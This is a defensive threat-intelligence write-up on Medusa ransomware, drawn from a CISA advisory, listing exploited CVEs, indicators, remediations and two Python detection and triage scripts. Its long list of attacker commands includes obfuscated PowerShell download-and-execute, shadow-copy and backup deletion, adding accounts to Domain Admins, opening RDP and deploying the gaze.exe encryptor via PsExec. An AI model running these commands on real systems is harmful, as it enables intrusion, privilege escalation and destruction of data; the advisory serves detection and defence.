Medusa Ransomware

Executive Summary

Those using the Medusa Ransomware-as-a-Service (RaaS) have demanded ransoms ranging from $100,000 to $15 million USD. According to CISA, the ransom note instructs victims to respond within 48 hours using either a live chat on the Tor browser or Tox, an end-to-end encrypted messaging platform. If the victim does not respond, Medusa operators will attempt to contact them directly via phone or email. Victims are given 10 days to pay and are charged $10,000 USD per day to extend this deadline. Like other threat actors, Medusa operators have engaged in double extortion, exfiltrating sensitive information before encrypting the victim's systems. Compromised data has previously been published on both an onion leak site and a public Telegram channel. According to the leak site, the organizations most impacted by this ransomware variant reside in the United States, and the actors target various critical infrastructure sectors such as critical manufacturing, finance, education, legal, insurance, information technology, and public healthcare / medical industries. Since the Medusa RaaS was first identified in June 2021, more than 300 organizations have been impacted as of February 2025.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) do not recommend that organizations pay ransoms, as there is no guarantee that files or systems will be restored, and complying with adversary demands simply encourages further attacks.

Attack Methodology

Symantec researchers have identified a new threat group, which they call Spearwing, that consistently employs the same tactics, techniques, and procedures (TTPs). This suggests that, rather than brokering access for other affiliates, the group is directly carrying out attacks while refining its ransomware.

Palo Alto Networks' Unit 42 threat intelligence analysts have found that phishing campaigns are a primary method of hijacking legitimate accounts, which initial access brokers then supply to other threat actors to enter target networks. Initial access is also suspected to result from exploiting unpatched vulnerabilities in public-facing Microsoft Exchange Servers. CISA has indicated that other exploited software vulnerabilities include, but are not limited to, ScreenConnect (CVE-2024-1709, https://www.cve.org/CVERecord?id=CVE-2024-1709) and Fortinet EMS SQL injection (CVE-2023-48788, https://www.cve.org/CVERecord?id=CVE-2023-48788).

The FBI's investigations of Medusa threat actors have uncovered the following living off the land (LOTL) techniques and commands.

cmd.exe /c certutil -f urlcache https:///.css .dll
cmd.exe /c certutil -f urlcache https:///.msi .msi
cmd.exe /c driverquery
cmd.exe /c echo Computer: %COMPUTERNAME% & echo Username: %USERNAME% & echo Domain: %USERDOMAIN% & echo Logon Server: %LOGONSERVER% & echo DNS Domain: %USERDNSDOMAIN% & echo User Profile: %USERPROFILE% & echo System Root: %SYSTEMROOT%
cmd.exe /c ipconfig /all
cmd.exe /c net share
cmd.exe /c net use
cmd.exe /c netstat -a
cmd.exe /c sc query
cmd.exe /c schtasks
cmd.exe /c systeminfo
cmd.exe /c ver
cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname
cmd.exe /c wmic printjob
mmc.exe compmgmt.msc /computer:{hostname/ip}
mstsc.exe /v:{hostname/ip}
mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}
powershell -exec bypass -enc <base64 encrypted command string>
powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RMM tool>.msi)
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('')-f'<character replacement 0>','<character replacement 1>','<character replacement 2>')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
powershell Remove-Item (Get-PSReadlineOption).HistorySavePath
powershell Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate,logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path  -NoTypeInformation -Encoding UTF8
psexec.exe -accepteula -nobanner -s \{hostname/ip} "c:\windows\system32\taskkill.exe" /f /im WRSA.exe
psexec.exe -accepteula -nobanner -s \{hostname/ip} -c coba.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -c openrdp.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -c StopAllProcess.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -c zam.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} c:\temp\x.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} cmd
psexec.exe -accepteula -nobanner -s \{hostname/ip} cmd /c   "c:\gaze.exe"
psexec.exe -accepteula -nobanner -s \{hostname/ip} cmd /c  "copy \ad02\sysvol\gaze.exe c:\gaze.exe
psexec.exe -accepteula -nobanner -s \{hostname/ip} cmd /c  "copy \ad02\sysvol\gaze.exe c:\gaze.exe && c:\gaze.exe"
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} -c coba.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} -c openrdp.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} -c zam.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} cmd
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} -с newuser.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с duooff.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с hostname/ipwho.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с newuser.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с removesophos.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с start.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с uninstallSophos.bat
nltest /dclist:
net group "domain admins" /domain
net group "Domain Admins" default /add /domain
net group "Enterprise Admins" default /add /domain
net group "Remote Desktop Users" default /add /domain
net group "Group Policy Creator Owners" default /add /domain
net group "Schema Admins" default /add /domain
net group "domain users" /domain
net user default /active:yes /domain
net user /add default /domain
query user
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0
systeminfo
vssadmin.exe Delete Shadows /all /quiet
vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded
del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.* %s*.set %s*.win %s*.dsk
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
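As an added defender-side example (this code is not from the advisory or from this page), the following Python scans constructed process-creation records for the command patterns listed above and flags hosts where several distinct techniques fire together. The pipe-delimited record format, the host and user names, the base64 fragment and the rule names are assumptions made for the example; the command strings the rules look for come from the list above.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation records (Sysmon Event ID 1 style,
# flattened to "host|user|parent_image|command_line"). Not real telemetry:
# hosts, users, the URL and the base64 fragment are invented for this example.
SAMPLE_EVENTS = [
    "ws01|CORP\\jdoe|explorer.exe|cmd.exe /c ipconfig /all",
    "ws01|CORP\\jdoe|cmd.exe|vssadmin.exe Delete Shadows /all /quiet",
    "ws01|CORP\\jdoe|explorer.exe|cmd.exe /c certutil -f urlcache https://example.invalid/x.css x.dll",
    "ws01|CORP\\jdoe|cmd.exe|netsh advfirewall firewall add rule name=\"rdp\" dir=in protocol=tcp localport=3389 action=allow",
    "ws01|CORP\\jdoe|cmd.exe|powershell Remove-Item (Get-PSReadlineOption).HistorySavePath",
    "fs02|NT AUTHORITY\\SYSTEM|services.exe|reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0",
    "fs02|CORP\\svc_backup|cmd.exe|powershell -nop -w hidden -noni -ep bypass -enc SQBFAFgAIAAoAE4A",
    "fs02|NT AUTHORITY\\SYSTEM|psexesvc.exe|cmd /c \"copy \\\\ad02\\sysvol\\gaze.exe c:\\gaze.exe && c:\\gaze.exe\"",
    "dc01|CORP\\jdoe|cmd.exe|net group \"Domain Admins\" default /add /domain",
    "ws03|CORP\\asmith|explorer.exe|notepad.exe C:\\Users\\asmith\\notes.txt",
]

# Each rule: (name, severity, pattern applied to the command line).
# Patterns are written against the LOTL commands reported in the advisory.
RULES = [
    ("shadow_copy_deletion", "high",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("restricted_admin_disabled", "high",
     re.compile(r"reg\s+add\s+.*\\Lsa\s+/v\s+DisableRestrictedAdmin", re.I)),
    ("rdp_enabled_via_registry", "medium",
     re.compile(r"fDenyTSConnections\s+/t\s+REG_DWORD\s+/d\s+0", re.I)),
    ("rdp_firewall_rule_added", "medium",
     re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule.*localport=3389", re.I)),
    ("encoded_or_bypass_powershell", "high",
     re.compile(r"powershell.*(-enc\b|-ep\s+bypass|-exec\s+bypass)", re.I)),
    ("privileged_group_addition", "high",
     re.compile(r"net\s+group\s+\"(domain admins|enterprise admins|schema admins|"
                r"remote desktop users|group policy creator owners)\".*\s/add", re.I)),
    ("certutil_download", "medium",
     re.compile(r"certutil.*urlcache", re.I)),
    ("gaze_encryptor_staging", "critical",
     re.compile(r"gaze\.exe", re.I)),
    ("powershell_history_cleared", "medium",
     re.compile(r"Remove-Item\s+\(Get-PSReadline?Option\)\.HistorySavePath", re.I)),
    ("recon_discovery", "low",
     re.compile(r"^(cmd\.exe\s+/c\s+)?(ipconfig\s+/all|net\s+share|net\s+use|netstat\s+-a|"
                r"sc\s+query|schtasks|systeminfo|driverquery|nltest\s+/dclist)", re.I)),
]

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    severity: str
    commandline: str


def parse_event(line):
    """Split one flattened record; the command line may itself contain '|'."""
    host, user, parent, cmdline = line.split("|", 3)
    return host, user, parent, cmdline


def scan(events):
    """Run every rule over every record; one Finding per (record, rule) hit."""
    findings = []
    for line in events:
        host, user, _parent, cmdline = parse_event(line)
        for name, severity, pattern in RULES:
            if pattern.search(cmdline):
                findings.append(Finding(host, user, name, severity, cmdline))
    return findings


def hosts_with_chained_activity(findings, min_rules=2, min_severity="medium"):
    """Return {host: [rules]} for hosts where at least `min_rules` distinct
    rules at or above `min_severity` fired. A single recon command is noisy
    on its own; several distinct techniques on one host is the signal worth
    escalating."""
    threshold = SEVERITY_RANK[min_severity]
    per_host = {}
    for f in findings:
        if SEVERITY_RANK[f.severity] >= threshold:
            per_host.setdefault(f.host, set()).add(f.rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_rules}


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.severity:8} {f.host:5} {f.rule:30} {f.commandline}")
    print("hosts with chained activity:", hosts_with_chained_activity(hits))
```

The low-severity recon rule is deliberately excluded from the per-host threshold by default: `ipconfig /all` or `net share` alone will fire constantly in any environment, whereas shadow-copy deletion, RestrictedAdmin being turned off and `gaze.exe` being copied out of SYSVOL on the same host within a short window is the combination that the command list above describes.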

Medusa actors have used Ligolo (https://github.com/nicocha30/ligolo-ng) as a reverse tunneling tool, as well as Cloudflared as a tunneling daemon, to proxy traffic in order to reach applications, services, or servers.

Rclone (https://rclone.org/) is used for data exfiltration. Furthermore, Sysinternals PsExec (https://learn.microsoft.com/en-us/sysinternals/downloads/psexec), PDQ Deploy (https://www.pdq.com/pdq-deploy/), or BigFix (https://www.hcl-software.com/bigfix) have been used by the Medusa actors to execute the AES-256 encryptor, known as `gaze.exe`, on files within the victim network. Unit 42 researchers identified another unusual tactic: use of the portable version of the publicly available SoftPerfect Network Scanner (https://www.softperfect.com/products/networkscanner/) with an augmented `netscan.xml` file, which provided a configuration defining custom functions named "Copy_Gaze", "Deploy Gaze", and "Copy_Run_Gaze". These correspond to embedded scripts containing Cyrillic characters that translate to the following network survey actions.

Indicators of Compromise:

!!!READ_ME_MEDUSA!!!.txt is the expected ransom note file name.

Encrypted files will have a .medusa file extension.

openrdp.bat allows incoming RDP and WMI connections using the following commands:

  • netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
  • netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
  • reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

pu.exe spawns a reverse shell
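As an added example for scoping an incident (this code is not from the advisory or from this page), the following Python sweeps a directory tree for the two file-system indicators named above, the `!!!READ_ME_MEDUSA!!!.txt` ransom note and the `.medusa` extension, and summarizes which directories were hit. The sample share layout it builds in a temporary directory is constructed for the example and is not real victim data.

```python
import os
import tempfile
from collections import Counter
from pathlib import Path

RANSOM_NOTE = "!!!READ_ME_MEDUSA!!!.txt"   # ransom note name from the advisory
ENCRYPTED_EXT = ".medusa"                 # extension appended to encrypted files


def sweep(root):
    """Walk `root` and collect Medusa file-system indicators.

    Returns (note_dirs, encrypted_files, per_dir_counts) with paths relative
    to `root`. The note is matched by exact name; the extension match is
    case-insensitive so a mixed-case rename is not missed."""
    note_dirs, encrypted = [], []
    per_dir = Counter()
    for dirpath, _dirs, files in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        for name in files:
            if name == RANSOM_NOTE:
                note_dirs.append(rel)
            elif name.lower().endswith(ENCRYPTED_EXT):
                encrypted.append(os.path.join(rel, name))
                per_dir[rel] += 1
    return sorted(note_dirs), sorted(encrypted), per_dir


def triage(root):
    """Condense a sweep into the numbers an incident lead asks for first."""
    notes, enc, per_dir = sweep(root)
    return {
        "ransom_notes": len(notes),
        "note_dirs": notes,
        "encrypted_files": len(enc),
        "affected_dirs": sorted(per_dir),
        "most_hit_dir": per_dir.most_common(1)[0][0] if per_dir else None,
    }


def build_sample_tree():
    """Constructed sample layout (assumption, not real data): two folders
    touched by the encryptor, each with a dropped note, and one untouched."""
    root = tempfile.mkdtemp(prefix="medusa_sweep_")
    layout = {
        "finance": ["q1.xlsx.medusa", "q2.xlsx.MEDUSA", RANSOM_NOTE],
        "hr": ["payroll.docx.medusa", RANSOM_NOTE],
        "public": ["readme.txt", "logo.png"],
    }
    for folder, names in layout.items():
        d = Path(root, folder)
        d.mkdir()
        for n in names:
            (d / n).write_bytes(b"sample")
    return root


if __name__ == "__main__":
    print(triage(build_sample_tree()))
```

Run it against a mounted copy of an affected share rather than the live system so that the walk itself does not alter access timestamps that forensics may still need.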

Email addresses affiliated with Medusa actors include:

Remediations:

  • Validate a data recovery plan to ensure sensitive and proprietary data is safeguarded in a secure location separate from the on-premises equipment.

  • Regularly back up this data and validate that restoration is possible and timely.

  • Require all service, administrator, and domain accounts to meet robust password requirements, especially a long minimum length.

  • Require VPNs for remote access.

  • Enforce multifactor authentication (MFA) to the fullest extent possible for access.

  • Disable command-line and script execution policies to ensure that threat actors are unable to use the methods listed above to facilitate privilege escalation and lateral movement.

Additional Information

If your organization has been affected by a ransomware incident, please report the details to the FBI's Internet Crime Complaint Center (https://www.ic3.gov/Home/ComplaintChoice), an FBI Field Office (https://www.fbi.gov/contact-us/field-offices), or CISA's Incident Reporting System (https://www.cisa.gov/report), by emailing CISA's 24/7 Operations Center at report@cisa.gov, or by calling 1-844-Say-CISA (1-844-729-2472).

The FBI could make use of the following information:

  • boundary logs indicating foreign IP addresses

  • ransom note files

  • any communication with the threat actor

  • any Bitcoin or other cryptocurrency wallets involved

  • a sample encrypted file

As an individual, you can also take action to back up an extra copy of your important data:

References

https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a

https://www.security.com/threat-intelligence/medusa-ransomware-attacks

https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/

https://www.darkreading.com/cyberattacks-data-breaches/fbi-cisa-alarmed-medusa-ransomware-attacks-grow
